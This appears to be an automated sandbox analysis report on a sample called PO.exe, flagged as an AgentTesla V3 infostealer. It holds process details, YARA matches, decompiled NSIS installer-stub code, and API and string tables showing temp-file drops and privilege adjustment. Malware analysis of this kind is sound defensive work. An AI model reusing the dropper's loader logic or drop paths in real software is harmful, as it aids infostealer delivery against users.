00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1336, Parent PID: 7240

General

Target ID:	5
Start time:	22:48:36
Start date:	29/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff60d240000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: PO.exePID: 5272, Parent PID: 5080COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	2.8%
Signature Coverage:	21.2%
Total number of Nodes:	1606
Total number of Limit Nodes:	48

Executed Functions

Function 004033B6 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_() {
				intOrPtr _t54;
				WCHAR* _t58;
				char* _t61;
				void* _t64;
				void* _t66;
				int _t68;
				int _t70;
				int _t73;
				intOrPtr* _t74;
				int _t75;
				int _t77;
				void* _t101;
				signed int _t118;
				void* _t121;
				void* _t126;
				intOrPtr _t145;
				intOrPtr _t146;
				intOrPtr* _t147;
				int _t149;
				void* _t152;
				int _t153;
				signed int _t157;
				signed int _t162;
				signed int _t167;
				void* _t169;
				void* _t171;
				int* _t173;
				signed int _t179;
				signed int _t182;
				CHAR* _t183;
				WCHAR* _t184;
				void* _t190;
				char* _t191;
				void* _t194;
				void* _t195;
				void* _t238;

				_t169 = 0x20;
				_t149 = 0;
				 *(_t195 + 0x14) = 0;
				 *(_t195 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t195 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t147 = E00406558(0);
					if(_t147 != 0) {
						 *_t147(0xc00);
					}
				}
				_t183 = "UXTHEME";
				do {
					E004064E8(_t183); // executed
					_t183 =  &(_t183[lstrlenA(_t183) + 1]);
				} while ( *_t183 != 0);
				E00406558(9);
				_t54 = E00406558(7);
				 *0x42a244 = _t54;
				__imp__#17(_t190);
				__imp__OleInitialize(_t149); // executed
				 *0x42a2f8 = _t54;
				SHGetFileInfoW(0x4216e8, _t149, _t195 + 0x34, 0x2b4, _t149); // executed
				E0040617E(0x429240, L"NSIS Error");
				_t58 = GetCommandLineW();
				_t191 = L"\"C:\\Users\\Arthur\\Desktop\\PO.exe\"";
				E0040617E(_t191, _t58);
				 *0x42a240 = GetModuleHandleW(_t149);
				_t61 = _t191;
				if(L"\"C:\\Users\\Arthur\\Desktop\\PO.exe\"" == 0x22) {
					_t61 =  &M00435002;
					_t169 = 0x22;
				}
				_t153 = CharNextW(E00405B5F(_t61, _t169));
				 *(_t195 + 0x18) = _t153;
				_t64 =  *_t153;
				if(_t64 == _t149) {
					L30:
					_t184 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t184);
					_t66 = E00403385(_t153, 0);
					_t220 = _t66;
					if(_t66 != 0) {
						L33:
						DeleteFileW(L"1033"); // executed
						_t68 = E00402E41(_t222,  *(_t195 + 0x1c)); // executed
						 *(_t195 + 0x10) = _t68;
						if(_t68 != _t149) {
							L45:
							E004038D5();
							__imp__OleUninitialize();
							_t234 =  *(_t195 + 0x10) - _t149;
							if( *(_t195 + 0x10) == _t149) {
								__eflags =  *0x42a2d4 - _t149;
								if( *0x42a2d4 == _t149) {
									L69:
									_t70 =  *0x42a2ec;
									__eflags = _t70 - 0xffffffff;
									if(_t70 != 0xffffffff) {
										 *(_t195 + 0x10) = _t70;
									}
									ExitProcess( *(_t195 + 0x10));
								}
								_t73 = OpenProcessToken(GetCurrentProcess(), 0x28, _t195 + 0x14);
								__eflags = _t73;
								if(_t73 != 0) {
									LookupPrivilegeValueW(_t149, L"SeShutdownPrivilege", _t195 + 0x20);
									 *(_t195 + 0x34) = 1;
									 *(_t195 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t195 + 0x28), _t149, _t195 + 0x24, _t149, _t149, _t149);
								}
								_t74 = E00406558(4);
								__eflags = _t74 - _t149;
								if(_t74 == _t149) {
									L67:
									_t75 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t75;
									if(_t75 != 0) {
										goto L69;
									}
									goto L68;
								} else {
									_t77 =  *_t74(_t149, _t149, _t149, 0x25, 0x80040002);
									__eflags = _t77;
									if(_t77 == 0) {
										L68:
										E0040140B(9);
										goto L69;
									}
									goto L67;
								}
							}
							E004058C3( *(_t195 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a25c == _t149) {
							L44:
							 *0x42a2ec =  *0x42a2ec | 0xffffffff;
							 *(_t195 + 0x14) = E004039C7( *0x42a2ec);
							goto L45;
						}
						_t173 = E00405B5F(_t191, _t149);
						if(_t173 < _t191) {
							L41:
							_t231 = _t173 - _t191;
							 *(_t195 + 0x10) = L"Error launching installer";
							if(_t173 < _t191) {
								_t171 = E00405846(_t234);
								lstrcatW(_t184, L"~nsu");
								if(_t171 != _t149) {
									lstrcatW(_t184, "A");
								}
								lstrcatW(_t184, L".tmp");
								_t193 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t184, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t184);
									if(_t171 == _t149) {
										E00405829();
									} else {
										E004057AC();
									}
									SetCurrentDirectoryW(_t184);
									_t238 = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Diakonernes" - _t149; // 0x43
									if(_t238 == 0) {
										E0040617E(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Diakonernes", _t193);
									}
									E0040617E(0x42b000,  *(_t195 + 0x18));
									_t154 = "A" & 0x0000ffff;
									 *0x42b800 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t194 = 0x1a;
									do {
										E004061A0(_t149, 0x420ee8, _t184, 0x420ee8,  *((intOrPtr*)( *0x42a250 + 0x120)));
										DeleteFileW(0x420ee8);
										if( *(_t195 + 0x10) != _t149 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\PO.exe", 0x420ee8, 1) != 0) {
											E0040601F(_t154, 0x420ee8, _t149);
											E004061A0(_t149, 0x420ee8, _t184, 0x420ee8,  *((intOrPtr*)( *0x42a250 + 0x124)));
											_t101 = E0040585E(0x420ee8);
											if(_t101 != _t149) {
												CloseHandle(_t101);
												 *(_t195 + 0x10) = _t149;
											}
										}
										 *0x42b800 =  *0x42b800 + 1;
										_t194 = _t194 - 1;
									} while (_t194 != 0);
									E0040601F(_t154, _t184, _t149);
								}
								goto L45;
							}
							 *_t173 = _t149;
							_t174 =  &(_t173[2]);
							if(E00405C3A(_t231,  &(_t173[2])) == 0) {
								goto L45;
							}
							E0040617E(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Diakonernes", _t174);
							E0040617E(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Diakonernes\\Referenceliste\\holdovers", _t174);
							 *(_t195 + 0x10) = _t149;
							goto L44;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t157 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t118 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t162 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
						while( *_t173 != _t157 || _t173[1] != _t118) {
							_t173 = _t173;
							if(_t173 >= _t191) {
								continue;
							}
							break;
						}
						_t149 = 0;
						goto L41;
					}
					GetWindowsDirectoryW(_t184, 0x3fb);
					lstrcatW(_t184, L"\\Temp");
					_t121 = E00403385(_t153, _t220);
					_t221 = _t121;
					if(_t121 != 0) {
						goto L33;
					}
					GetTempPathW(0x3fc, _t184);
					lstrcatW(_t184, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t184);
					SetEnvironmentVariableW(L"TMP", _t184);
					_t126 = E00403385(_t153, _t221);
					_t222 = _t126;
					if(_t126 == 0) {
						goto L45;
					}
					goto L33;
				} else {
					goto L8;
				}
				do {
					L8:
					_t152 = 0x20;
					if(_t64 != _t152) {
						L10:
						if( *_t153 == 0x22) {
							_t153 = _t153 + 2;
							_t152 = 0x22;
						}
						if( *_t153 != 0x2f) {
							goto L24;
						} else {
							_t153 = _t153 + 2;
							if( *_t153 == 0x53) {
								_t146 =  *((intOrPtr*)(_t153 + 2));
								if(_t146 == 0x20 || _t146 == 0) {
									 *0x42a2e0 = 1;
								}
							}
							asm("cdq");
							asm("cdq");
							_t167 = L"NCRC" & 0x0000ffff;
							asm("cdq");
							_t179 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t167;
							if( *_t153 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t167) &&  *((intOrPtr*)(_t153 + 4)) == _t179) {
								_t145 =  *((intOrPtr*)(_t153 + 8));
								if(_t145 == 0x20 || _t145 == 0) {
									 *(_t195 + 0x1c) =  *(_t195 + 0x1c) | 0x00000004;
								}
							}
							asm("cdq");
							asm("cdq");
							_t162 = L" /D=" & 0x0000ffff;
							asm("cdq");
							_t182 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t162;
							if( *(_t153 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t162) ||  *_t153 != _t182) {
								goto L24;
							} else {
								 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
								__eflags = _t153;
								E0040617E(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Diakonernes", _t153);
								L29:
								_t149 = 0;
								goto L30;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t153 = _t153 + 2;
					} while ( *_t153 == _t152);
					goto L10;
					L24:
					_t153 = E00405B5F(_t153, _t152);
					if( *_t153 == 0x22) {
						_t153 = _t153 + 2;
					}
					_t64 =  *_t153;
				} while (_t64 != 0);
				goto L29;
			}

0x004033c1
0x004033c2
0x004033c9
0x004033cd
0x004033d5
0x004033d9
0x004033e9
0x004033ec
0x004033f3
0x004033fa
0x004033fa
0x004033f3
0x004033fc
0x00403401
0x00403402
0x0040340e
0x00403412
0x0040341a
0x00403421
0x00403426
0x0040342b
0x00403432
0x00403438
0x0040344e
0x0040345e
0x00403463
0x00403469
0x00403470
0x00403484
0x00403489
0x0040348b
0x0040348f
0x00403494
0x00403494
0x004034a3
0x004034a5
0x004034a9
0x004034af
0x004035c6
0x004035cc
0x004035d7
0x004035d9
0x004035de
0x004035e0
0x00403638
0x0040363d
0x00403647
0x0040364e
0x00403652
0x00403703
0x00403703
0x00403708
0x0040370e
0x00403713
0x00403839
0x0040383f
0x004038bd
0x004038bd
0x004038c2
0x004038c5
0x004038c7
0x004038c7
0x004038cf
0x004038cf
0x0040384f
0x00403855
0x00403857
0x00403864
0x00403877
0x0040387f
0x00403887
0x00403887
0x0040388f
0x00403894
0x0040389b
0x004038a9
0x004038ac
0x004038b2
0x004038b4
0x00000000
0x00000000
0x00000000
0x0040389d
0x004038a3
0x004038a5
0x004038a7
0x004038b6
0x004038b8
0x00000000
0x004038b8
0x00000000
0x004038a7
0x0040389b
0x00403722
0x00403729
0x00403729
0x0040365e
0x004036f3
0x004036f3
0x004036ff
0x00000000
0x004036ff
0x0040366b
0x0040366f
0x004036bd
0x004036bd
0x004036bf
0x004036c7
0x0040373a
0x0040373c
0x00403743
0x0040374b
0x0040374b
0x00403756
0x0040375b
0x0040376a
0x0040376e
0x0040376f
0x00403778
0x00403771
0x00403771
0x00403771
0x0040377e
0x00403784
0x0040378b
0x00403793
0x00403793
0x004037a1
0x004037ad
0x004037bb
0x004037c0
0x004037c6
0x004037d2
0x004037d8
0x004037e2
0x004037f8
0x00403809
0x0040380f
0x00403816
0x00403819
0x0040381f
0x0040381f
0x00403816
0x00403823
0x0040382a
0x0040382a
0x0040382f
0x0040382f
0x00000000
0x0040376a
0x004036c9
0x004036cc
0x004036d7
0x00000000
0x00000000
0x004036df
0x004036ea
0x004036ef
0x00000000
0x004036ef
0x00403678
0x00403690
0x004036a1
0x004036a2
0x004036a6
0x004036a8
0x004036b6
0x004036b9
0x00000000
0x00000000
0x00000000
0x004036b9
0x004036bb
0x00000000
0x004036bb
0x004035e8
0x004035f4
0x004035f9
0x004035fe
0x00403600
0x00000000
0x00000000
0x00403608
0x00403610
0x00403621
0x00403629
0x0040362b
0x00403630
0x00403632
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004034b5
0x004034b5
0x004034b7
0x004034bb
0x004034c4
0x004034c8
0x004034cd
0x004034ce
0x004034ce
0x004034d3
0x00000000
0x004034d9
0x004034da
0x004034df
0x004034e1
0x004034e9
0x004034f0
0x004034f0
0x004034e9
0x00403501
0x00403514
0x00403515
0x0040352a
0x0040352f
0x00403533
0x0040353c
0x00403544
0x0040354b
0x0040354b
0x00403544
0x00403557
0x0040356a
0x0040356b
0x00403580
0x00403586
0x0040358a
0x00000000
0x004035b1
0x004035b1
0x004035b6
0x004035bf
0x004035c4
0x004035c4
0x00000000
0x004035c4
0x0040358a
0x00000000
0x00000000
0x00000000
0x004034bd
0x004034bd
0x004034be
0x004034bf
0x00000000
0x00403592
0x00403599
0x0040359f
0x004035a2
0x004035a2
0x004035a3
0x004035a6
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 004033D9
GetVersion.KERNEL32 ref: 004033DF
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403408
#17.COMCTL32(00000007,00000009), ref: 0040342B
OleInitialize.OLE32(00000000), ref: 00403432
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 0040344E
GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 00403463
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\PO.exe",00000000), ref: 00403476
CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO.exe",00000020), ref: 0040349D

Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035D7
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035E8
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F4
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403608
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403610
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403621
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403629
DeleteFileW.KERNELBASE(1033), ref: 0040363D

Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B

OleUninitialize.OLE32(?), ref: 00403708
ExitProcess.KERNEL32 ref: 00403729
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040373C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040374B
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403756
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO.exe",00000000,?), ref: 00403762
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040377E
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?), ref: 004037D8
CopyFileW.KERNEL32(C:\Users\user\Desktop\PO.exe,00420EE8,00000001), ref: 004037EC
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 00403819
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403848
OpenProcessToken.ADVAPI32(00000000), ref: 0040384F
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403864
AdjustTokenPrivileges.ADVAPI32 ref: 00403887
ExitWindowsEx.USER32(00000002,80040002), ref: 004038AC
ExitProcess.KERNEL32 ref: 004038CF

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes, xrefs: 004035BA, 004036DA, 00403784, 0040378E
TMP, xrefs: 00403624
"C:\Users\user\Desktop\PO.exe", xrefs: 00403469, 0040346F, 00403665
SeShutdownPrivilege, xrefs: 0040385E
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033CD
C:\Users\user\AppData\Local\Temp\, xrefs: 004035CC, 004035D1, 004035E7, 004035F3, 00403602, 0040360F, 0040361B, 00403623, 00403739, 0040374A, 00403755, 00403761, 0040376E, 0040377D, 0040382E
Low, xrefs: 0040360A
.tmp, xrefs: 00403750
C:\Users\user\Desktop, xrefs: 0040375B, 00403760, 0040378D
\Temp, xrefs: 004035EE
1033, xrefs: 00403638
C:\Users\user\Desktop\PO.exe, xrefs: 004037E7
UXTHEME, xrefs: 004033FC, 00403401, 00403407
Error launching installer, xrefs: 004036BF
~nsu, xrefs: 00403734
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Referenceliste\holdovers, xrefs: 004036E5
TEMP, xrefs: 0040361C
NSIS Error, xrefs: 00403454

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\PO.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Referenceliste\holdovers$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-2425493441
Opcode ID: 1d8223e16c8a6003b83d058067bded84b497836c53eb7fdc95fb885acef81e31
Instruction ID: be8551fa6605ebbbfda7487142ffb020be8bd547a3943651712312bea09c5587
Opcode Fuzzy Hash: 1d8223e16c8a6003b83d058067bded84b497836c53eb7fdc95fb885acef81e31
Instruction Fuzzy Hash: AED10571200300ABE7207F659D49A2B3AEDEB4074AF50443FF881B62D2DB7C8956876E

Uniqueness

Uniqueness Score: -1.00%

Function 0040541C Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0040541C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429224;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E004053B0, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004061A0(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423728;
								_v44 = 0x1fff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42920c == _t156) {
							ShowWindow( *0x42a248, 8);
							if( *0x42a2cc == _t156) {
								_t119 =  *0x422700; // 0x6aca44
								_t57 = _t119 + 0x34; // 0xffffffd4
								E004052DD( *_t57, _t156);
							}
							E0040421B(_t171);
							goto L25;
						}
						 *0x421ef8 = 2;
						E0040421B(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004042A9(_a8, _a12, _a16);
						}
						ShowWindow( *0x429210, _t156);
						ShowWindow(_t169, 8);
						E00404277(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a250;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429210 = GetDlgItem(_a4, 0x403);
				 *0x429208 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429224 = _t134;
				_v8 = _t134;
				E00404277( *0x429210);
				 *0x429214 = E00404B7A(4);
				 *0x42922c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404242(_a4);
				if(( *0x42a258 & 0x00000003) != 0) {
					ShowWindow( *0x429210, _t156);
					if(( *0x42a258 & 0x00000002) != 0) {
						 *0x429210 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404277( *0x429208);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a258 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x00405424
0x0040542a
0x00405434
0x00405437
0x004055cd
0x004055ea
0x004055f1
0x004055f1
0x00405604
0x00405622
0x00405624
0x0040562c
0x00405682
0x00405686
0x00000000
0x00000000
0x00405688
0x0040568e
0x00000000
0x00000000
0x00405698
0x004056a0
0x004056a3
0x004057a5
0x00000000
0x004057a5
0x004056b2
0x004056bd
0x004056c6
0x004056d1
0x004056d4
0x004056dd
0x004056e3
0x004056e6
0x004056e6
0x004056fe
0x00405707
0x0040570a
0x00405711
0x00405718
0x00405720
0x00405720
0x00405737
0x00405737
0x0040573e
0x00405744
0x00405750
0x00405757
0x00405760
0x00405762
0x00405765
0x00405774
0x00405777
0x0040577d
0x0040577e
0x00405784
0x00405785
0x00405786
0x0040578e
0x00405799
0x0040579f
0x0040579f
0x00000000
0x004056fe
0x00405634
0x00405664
0x0040566c
0x0040566e
0x00405674
0x00405677
0x00405677
0x0040567d
0x00000000
0x0040567d
0x00405638
0x00405642
0x00000000
0x00405606
0x0040560c
0x00405647
0x00000000
0x00405650
0x00405615
0x0040561a
0x0040561d
0x00000000
0x0040561d
0x00405604
0x0040543d
0x00405441
0x00405449
0x0040544d
0x00405450
0x00405453
0x00405456
0x00405459
0x0040545a
0x0040545b
0x00405474
0x00405477
0x00405481
0x00405490
0x00405498
0x004054a0
0x004054a5
0x004054a8
0x004054b4
0x004054bd
0x004054c6
0x004054e8
0x004054ee
0x004054ff
0x00405504
0x00405512
0x00405520
0x00405520
0x00405525
0x00405533
0x00405533
0x00405538
0x0040553b
0x00405540
0x0040554c
0x00405555
0x00405562
0x00405571
0x00405564
0x00405569
0x00405569
0x0040557d
0x0040557d
0x00405591
0x0040559a
0x004055a3
0x004055b3
0x004055bf
0x004055bf
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 0040547A
GetDlgItem.USER32(?,000003EE), ref: 00405489
GetClientRect.USER32(?,?), ref: 004054C6
GetSystemMetrics.USER32(00000002), ref: 004054CD
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054EE
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054FF
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405512
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405520
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405533
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405555
ShowWindow.USER32(?,00000008), ref: 00405569
GetDlgItem.USER32(?,000003EC), ref: 0040558A
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559A
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B3
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055BF
GetDlgItem.USER32(?,000003F8), ref: 00405498

Part of subcall function 00404277: SendMessageW.USER32(00000028,?,00000001,004040A3), ref: 00404285

GetDlgItem.USER32(?,000003EC), ref: 004055DC
CreateThread.KERNEL32(00000000,00000000,Function_000053B0,00000000), ref: 004055EA
CloseHandle.KERNELBASE(00000000), ref: 004055F1
ShowWindow.USER32(00000000), ref: 00405615
ShowWindow.USER32(?,00000008), ref: 0040561A
ShowWindow.USER32(00000008), ref: 00405664
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405698
CreatePopupMenu.USER32 ref: 004056A9
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056BD
GetWindowRect.USER32(?,?), ref: 004056DD
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056F6
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040572E
OpenClipboard.USER32(00000000), ref: 0040573E
EmptyClipboard.USER32 ref: 00405744
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405750
GlobalLock.KERNEL32(00000000), ref: 0040575A
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040576E
